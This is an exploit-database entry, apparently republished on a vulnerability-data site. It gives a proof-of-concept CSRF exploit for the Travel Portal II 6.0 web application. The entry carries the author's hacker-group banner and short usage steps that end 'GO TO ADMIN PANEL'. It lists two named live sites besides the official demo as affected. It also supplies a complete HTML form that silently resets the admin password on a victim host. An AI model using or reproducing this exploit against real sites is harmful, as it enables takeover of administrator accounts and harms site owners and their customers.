`Travel Portal II (6.0) - CSRF Admin Password Change PoC Exploit
~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[+] Author : KnocKout
[~] Contact(onlymail) : [email protected]
[~] HomePage : http://Cyber-Warrior.Org - http://h4x0resec.blogspot.com - http://www.cyber-warrior.org/100379
[~] Greetz: DaiMon,furty,BackDoor,EthicalHacker,BARCOD3,SZE©,VolqaN,Septemb0x.. Unuttuklarýmýz affola..
############################################################
Turkey Security Group
'h4x0re SECURITY'
###########################################################
~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|~Web App. : Travel Portal II (6.0)
|~Affected Version : II 6.0 and predecessors.. / all version
|~Official Software Web: http://www.tourismscripts.com/scripts/scripts/hotel-cars-flights-villas-flats-custom-potal-script.html
|~PRICE : 349 Euro
|~RISK : High
|~Google Keyword/Dorks : N/A
|~Tested On : Kali Linux \ Mozilla Firefox
####################INFO################################
admin password can be changed easily..
####################Usage Exploit########################
Exploitation
Edit to exploit.html target website..
Open exploit.html your browser..
Determine your new password.
GO TO ADMIN PANEL..
####################Example affected sites & Tested on#####
http://travelportal.tourismscripts.com/ ( Official Demo )
http://almarjanmakkah.com
http://www.istanbulairportal.com
==============================================================================00
Travel Portal II (6.0) - CSRF Admin Password Change PoC Exploit ; exploit.html
==============================================================================0
<h3>Travel Portal II (6.0) - CSRF Admin Password Change PoC Exploited by KnocKout</h3>
<table>
<tr>
<form method="post" action="http://[VICTIM]/admin/admin.php">
<input type="hidden" name="admin_id" value="1">
<td align=right>Username:</td><td align=left><input name="admin_name" size="40" maxlength="40" value="admin"><td>
</tr>
<tr>
<td align=right>New Password:</td><td align=left><input name="password" size="40" maxlength="40" ><td>
</tr>
<tr>
<td></td><td><input type="submit" name="submit" value="Update Password"></td>
</form>
</tr>
</table>
=================================================================================
.__ _____ _______
| |__ / | |___ __\ _ \_______ ____
| | \ / | |\ \/ / /_\ \_ __ \_/ __ \
| Y \/ ^ /> <\ \_/ \ | \/\ ___/
|___| /\____ |/__/\_ \\_____ /__| \___ >
\/ |__| \/ \/ \/
_____________________________
/ _____/\_ _____/\_ ___ \
\_____ \ | __)_ / \ \/
/ \ | \\ \____
/_______ //_______ / \______ /
\/ \/ \/
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation